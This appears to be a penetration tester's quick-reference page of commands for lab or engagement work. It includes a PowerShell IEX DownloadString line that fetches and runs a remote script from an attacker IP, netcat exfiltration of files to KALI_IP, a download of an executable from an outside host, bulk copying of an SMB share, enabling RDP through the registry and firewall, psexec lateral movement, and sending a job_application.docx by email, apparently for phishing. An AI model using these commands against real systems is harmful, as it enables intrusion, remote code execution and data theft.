Commands

Simple server

sudo python -m http.server 80

Start / stop Apache

/etc/init.d/apache2 start

/etc/init.d/apache2 stop

(monitor Apache logs -> tail -f /var/log/apache2/access.log)

Allow PowerShell script execution

powershell -nop -exec bypass

SMB share moving files Windows - Kali

sudo impacket-smbserver win_share /mnt/win_share

Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
net use \\192.168.220.128\win_share

SMB share (with SMBv2 support, prevents having to enable Windows feature)

sudo impacket-smbserver win_share /mnt/win_share -smb2support -username Joe -password 123

Upgrade non-interactive shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color
stty rows 70 columns 316

proxychains nmap flags for faster scan

proxychains nmap -iL targets.txt -sT -Pn --top-ports 100

// Change in -> /etc/proxychains4.conf
tcp_read_time_out 1200
tcp_connect_time_out 800

psexec syntax

.\PsExec64.exe -s \\192.168.229.159 cmd -accepteula
.\PsExec64.exe -s \\jump09 cmd -accepteula

psexec doesnt work from within an interactive shell, execute it from RDP session instead

Monitor incoming ICMP (nice to check code execution)

sudo tcpdump -i tun0 icmp and icmp[icmptype]=icmp-echo

sendEmail

sendEmail -t [email protected] -f [email protected] -s 172.16.123.105 -u Test -a job_application.docx

Download all data from share using smbclient

smbclient \\\\10.10.120.5\\home$ -U RLAB\\bowen
mask ""
recurse ON
prompt OFF
cd 'path\to\remote\dir'
lcd '~/path/to/download/to/'
mget *

Remote import-module (wont touch disk)

IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.7/ASREPRoast.ps1')

Transfer file with SSH (SCP) syntax

scp -i ssh_key CVE-2021-4034.py [email protected]:/tmp/

Exfil file with NC syntax

Kali:
nc -l -p 1234 > file.out

Victim:
nc KALI_IP 1234 < file.in

base64 binary:

base64 winPEASany_ofs.exe | tr -d '\n\r' | xclip -sel clip

base64 decode windows:

certutil -decode base.txt base.exe

Copy to clipboard (unix)

xclip -selection c < test.txt
cat test.txt | pbcopy

Enable RDP

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Windows easy file download

powershell.exe wget http://10.10.14.15/443.exe -OutFile C:\users\Public\downloads\443.exe

Last updated 7 months ago